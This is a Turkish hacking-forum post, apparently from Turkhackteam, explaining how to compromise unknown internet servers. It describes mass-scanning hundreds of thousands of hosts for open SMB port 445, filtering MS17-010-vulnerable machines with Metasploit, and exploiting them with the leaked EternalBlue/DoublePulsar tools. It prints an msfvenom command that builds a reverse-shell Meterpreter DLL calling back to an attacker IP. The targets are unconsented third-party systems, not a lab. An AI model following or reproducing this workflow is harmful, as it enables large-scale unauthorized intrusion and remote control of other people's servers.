İp Adresinden Sızmak

fuzzbunch

Üye
25 Mar 2018
152
2
Mugla
Bu yazımda İsin Teori kısmından bahsedecegim Uygulama Kısmını Belki Sonra Yazarım
evet biliyorsunuz ki bircok sızma olayı local agda denenıyor.bugun local agın biraz dısarasına cıkacagız.

Oncelıkle yapcagamız ısın mantıgından bahsedeyim

400-500 bin sunucuda 445.portunun acık olup olmadıgını kontrol edecegız nmap yardımı ile dns sorgu vb. seylerı kaldıracagız tabikide. olabilecek en hızlı taramayı yapacagız.

yaptıgımız tarama sonucunda Yaklaşık olarak;

* 100 bin sunucuda 100 adet 445. portu acık sunucu cıkıyor .
* 100 bin sunucu yaklasık 1.5-3 dakikada taranıyor .
* 100-200 adet smb portu acık sunucuda 1-2 adet ms17_010 zafiyeti olan makina cıkıyor .

evet cıkan cıktıları nmap ın -oN komutu sayesınde txt doyasına kaydedecegız.

txt doyasındaki ip adreslerini grep yardımı ile alt alta yazdıracagız ve > komutu ile baska bir txt dosyasına yazdıracagız

tamam artık ip adreslerini listeledik bundan sonra m.e.t.asploit yardımı ile -q ve -x parametrelerini kullanarak ms17_010 auxliary'sinin RHOSTS kısmına girecegiz .

tarama bittikten sonra cıktıyı baska bir txt dosyasını kaydedıp grep ile acıklı sunucuları listelecegiz

grep [+] [!] file.txt > file2.txt şeklinde

sonra file2.txt dosyasını "cat" ile ekrana yazdıracagız.

sonra file2.txt dosyasının icindeki ip bu sefer file3.txt ye aktaracagız ve m.e.t.asploitin smb sunucuları'da bilgi edinmek ıcın getırdıgı auxlıary'sinin "RHOSTS" Kısmına yonlendırecegız.

bunları yaparken "THREADS" lere baya bi abanacagız "THREADS" leri yuksek tutacagız burası onemli yoksa cok uzun surer .

tum bunları yaptıktan sonra bunlar ıcın bır scrıpt yazacagız (yazımı basit) ve yazdıgımız scrıpt gereken bilgileri grep ile toparlayıp bize cat ile sunacak .

bundan sonra Fuzzbunch kullanacagız(burdan Fuzzbunch ıcın Shadow Brokers'a tesekkurler) Eternalblue veya Doublepulsar kullanacagız

Eger Doublepulsar icin kullancak isek bir dll payloadı olusturmanız gerek

msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.123.123.123 LPORT=1234 -f dll -o /root/shadowbroker/windows/storoge/deneme.dll seklınde
ve dll payloadını secerken Fuzzbunch'a

Z:\root\shadowbroker\windows\storoge\deneme.dll
seklınde yazmamız gerekıyor

Herneyse exploit kısmını ve fuzzbunch u kendınız arastırırsınız artık

grep [+] [!] file.txt
! !
! !
! !

Eternalblue Doublepulsar

burada" [+] "Eternalblue icin bulmak ıcın "[!] "doublepulsar için



Konunu sonuna Sevdigim bir sarkı ve aynı zamanda ip adresinden sunuculara sızan bir kisinin oldugu bir video koymak ıstedim

https://www.youtube.com/watch?list=UUaaW-O6h0JvTbOPeDdxXW8Q&v=G4EpfvWXUlY
 
Son düzenleme:

fuzzbunch

Üye
25 Mar 2018
152
2
Mugla
bu arada Acık bulmak ıcın Yazdıgınız scrıpt max 10-30 satır kod tutuyor tabi bunu baya bi genisletirseniz minimum 100-200 satır kod tutuyor bilginize
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.